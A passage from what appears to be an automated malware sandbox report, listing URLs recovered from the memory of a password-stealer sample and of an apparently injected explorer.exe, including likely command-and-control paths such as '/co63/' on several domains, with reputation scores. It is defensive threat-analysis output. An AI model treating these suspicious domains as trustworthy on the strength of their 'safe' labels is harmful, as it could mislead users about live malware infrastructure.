                                      http://www.takealicense.comReferer:explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.takealicense.com/co63/www.naspewt.xyzexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.vestostore.comReferer:explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.freepad168.com/co63/explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.fontbureau.com/designersSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.fontbureau.comTTFSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396031854.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395847311.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395903699.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395807046.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395753968.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395704173.0000000005757000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.creativebrea.com/co63/www.mazinhoccb.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.naspewt.xyzexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.fontbureau.comcom6SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396121393.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396210983.0000000005757000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.dulichphucbinh.comReferer:explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.founder.com.cn/cnu-eNSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.390314780.0000000005776000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.390359851.0000000005776000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.sajatypeworks.comSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.founder.com.cn/cn/cTheSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.ballthingsez.comReferer:explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.jiyu-kobo.co.jp/6SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391472420.0000000005754000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391725464.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391782567.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391672235.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.creativebrea.comReferer:explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.zhongyicts.com.cnvaBSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.390741938.000000000575B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.jiyu-kobo.co.jp/n-uSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391725464.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391782567.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391672235.0000000005756000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.creativebrea.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.galapagosdesign.com/DPleaseSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.naspewt.xyzReferer:explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.fontbureau.com6SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.396031854.0000000005757000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.creativebrea.com/co63/explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.dulichphucbinh.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.myccsmartmove.comReferer:explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.urwpp.deDPleaseSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.f1-austin-tickets.com/co63/www.inf9obase.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.jiyu-kobo.co.jp/$SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391472420.0000000005754000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.zhongyicts.com.cnSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.390741938.000000000575B000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.inf9obase.com/co63/explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.430926613.0000000002CB5000.00000004.00000800.00020000.00000000.sdmp, hkkRsa.exe, 00000009.00000002.449838266.0000000002FB5000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.mazinhoccb.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000000F.00000000.451928214.000000000091F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.f1-austin-tickets.comReferer:explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.galapagosdesign.com/SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.398342627.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.398248570.0000000005757000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.comcomaSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395278067.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395023468.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.395121921.0000000005757000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.pym479.com/co63/www.creativebrea.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.cucinainvenice.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://components.groove.net/Groove/Components/Root.osd?Package=net.groove.Groove.Tools.System.Groovexplorer.exe, 0000000F.00000000.478178422.00007FFA13109000.00000002.00000001.01000000.0000000B.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.dlafluid.comReferer:explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.vestostore.com/co63/www.saleschildcarriers.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/ASecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391472420.0000000005754000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391405610.0000000005755000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391725464.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391280868.0000000005751000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391672235.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.mazinhoccb.comReferer:explorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://en.wSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.387986518.0000000005745000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/=SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392066294.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391405610.0000000005755000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391725464.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391867029.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391782567.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392020681.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391280868.0000000005751000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392117186.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391672235.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.saleschildcarriers.com/co63/www.ballthingsez.comexplorer.exe, 0000000F.00000003.585527258.000000000F0AC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.574369672.000000000F0A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.567388983.000000000F081000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.623765618.000000000F0AF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.558800756.000000000F0A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.564245128.000000000F0A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.carterandcone.comlSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers/frere-jones.htmlSecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000002.438709862.0000000006DF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.founder.com.cn/cn-SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.390314780.0000000005776000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.390372892.0000000005776000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.390236589.0000000005776000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.390359851.0000000005776000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.jiyu-kobo.co.jp/jp/$SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392066294.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392167050.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391725464.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391867029.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392276202.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392786588.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391782567.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392020681.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392926230.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392117186.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391672235.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392383105.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.391554635.0000000005756000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 00000000.00000003.392213201.0000000005757000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe, 